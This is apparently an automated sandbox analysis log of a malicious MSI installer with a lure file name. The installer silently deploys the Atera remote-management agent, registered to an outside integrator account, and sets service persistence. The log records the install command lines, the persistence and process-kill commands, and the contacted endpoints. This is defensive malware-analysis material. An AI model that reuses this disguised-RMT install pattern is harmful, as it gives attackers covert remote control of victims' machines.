                              Source: AgentPackageAgentInformation.exe, 00000013.00000002.1777274260.000002AC50783000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000017.00000002.2229922038.000002C4536AF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResult
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommands
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommands)
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommandsFallback
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommandsp
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetEnvironmentStatus
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages
                              Source: AteraAgent.exe, 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackagesckNTIALBACKOFF02ceca8-a958-11e5-bd8
                              Source: rundll32.exe, 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/track-event
                              Source: rundll32.exe, 00000004.00000003.1382870012.0000000004757000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1394167510.0000000004A09000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1454680020.000000000414A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000F.00000002.2644921266.00000188B0072000.00000002.00000001.01000000.0000001C.sdmp, rundll32.exe, 00000012.00000003.1543865163.00000000044EA000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000013.00000002.1778395763.000002AC68ED2000.00000002.00000001.01000000.0000001B.sdmp, Newtonsoft.Json.dll.6.dr, Newtonsoft.Json.dll.4.dr, Newtonsoft.Json.dll.2.dr, Newtonsoft.Json.dll.5.dr, Newtonsoft.Json.dll.15.dr, Newtonsoft.Json.dll.18.drString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                              Source: System.ValueTuple.dll.2.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
                              Source: System.ValueTuple.dll.2.drString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
                              Source: AteraAgent.exe, 0000000F.00000002.2649410681.00000188B0742000.00000002.00000001.01000000.0000001D.sdmp, ICSharpCode.SharpZipLib.dll.2.drString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49768 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49771 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 108.158.75.93:443 -> 192.168.2.7:49796 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49932 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49931 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49963 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49988 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:49994 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50000 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50009 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50014 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50015 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50023 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50031 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50066 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50069 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50073 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 13.232.67.198:443 -> 192.168.2.7:50078 version: TLS 1.2
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                              Spam, unwanted Advertisements and Ransom Demands

                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AlphaAgent
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\6c6861.msi
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6A36.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7013.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI87B3.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8A82.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8A93.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8B30.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8C79.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\6c6863.msi
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA9F5.tmp
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI6A36.tmp-
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI6A36.tmp-\Newtonsoft.Json.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI6A36.tmp-\System.Management.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI6A36.tmp-\CustomAction.config
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI7013.tmp-
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI7013.tmp-\System.Management.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI7013.tmp-\CustomAction.config
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI87B3.tmp-
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI87B3.tmp-\Newtonsoft.Json.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI87B3.tmp-\System.Management.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI87B3.tmp-\CustomAction.config
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\InstallUtil.InstallLog
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1A374813EDB1A6631387E414D3E73232
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1A374813EDB1A6631387E414D3E73232
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BA74182F76F15A9CF514DEF352303C95
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA9F5.tmp-
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA9F5.tmp-\System.Management.dll
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA9F5.tmp-\CustomAction.config
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                              Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI6A36.tmp
                              Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                              Source: Guidelines_for_Citizen_Safety.msi Binary or memory string: OriginalFilenameAlphaControlAgentInstallation.dll\ vs Guidelines_for_Citizen_Safety.msi
                              Source: Guidelines_for_Citizen_Safety.msi Binary or memory string: OriginalFilenameSfxCA.dll\ vs Guidelines_for_Citizen_Safety.msi
                              Source: Guidelines_for_Citizen_Safety.msi Binary or memory string: OriginalFilenamewixca.dll\ vs Guidelines_for_Citizen_Safety.msi
                              Source: AteraAgent.exe.2.dr, SignatureValidator.csBase64 encoded string: 'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0YmxeR/2wifvwd/MQXb/5tsLsvlMs50tmraklX8MKsU1EgEpRZ+W0Ro1ZHoLhQG53oq9hPz9bmJge78yZr6l1QJWz6wCj+yQUxM5f0gt4fHEf2yA94Tklnds7JPr2vQRb5rjAnxnt7722oWFc1bxFFsIcIhOI/EHYCE0qSPE1pKMXALkHZYoDQEFUu3YgEc0Oo7ClJNFrB75g6tVZRqGKxVvYQBb9zKDxhBRnDkhZuB7D1gRaR9PNwCr7tVtPt40c+CCf5ktUkeu4JzaiEipWvKYgRvotqsFtZF5uFso2UmdvxO+lIw9i/GPDfgS4JhKu/Y9lCuaan+xEluhSK0vpQIDAQAB'
                              Source: classification engine Classification label: mal88.troj.spyw.evad.winMSI@37/86@13/2
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ATERA Networks
                              Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
                              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
                              Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4856:120:WilError_03
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Mutant created: NULL
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7232:120:WilError_03
                              Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6564:120:WilError_03
                              Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7652:120:WilError_03
                              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8128:120:WilError_03
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF9340E6CB357EA061.TMP
                              Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;AteraAgent.exe&quot;)
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | File read: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                              Source: C:\Windows\System32\msiexec.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI6A36.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7105375 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                              Source: Guidelines_for_Citizen_Safety.msi | Static file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
                              Source: Guidelines_for_Citizen_Safety.msi | ReversingLabs: Detection: 28%
                              Source: unknown | Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Guidelines_for_Citizen_Safety.msi"
                              Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding DA0792725E6113A4C2EFC78428B5F22F
                              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI6A36.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7105375 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI7013.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7106625 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI87B3.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7112656 11 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                              Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F2302B5C45E6CFD0540EEC21654A91D9 E Global\MSI0000
                              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                              Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                              Source: C:\Windows\SysWOW64\taskkill.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="paul.fraxom@yzistanbul.me" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000Kso2pIAB" /AgentId="2094f497-2e94-42f0-b27c-add7e377a9d2"
                              Source: unknown | Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | Process created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                              Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIA9F5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_7121500 33 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe | Process created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000Kso2pIAB
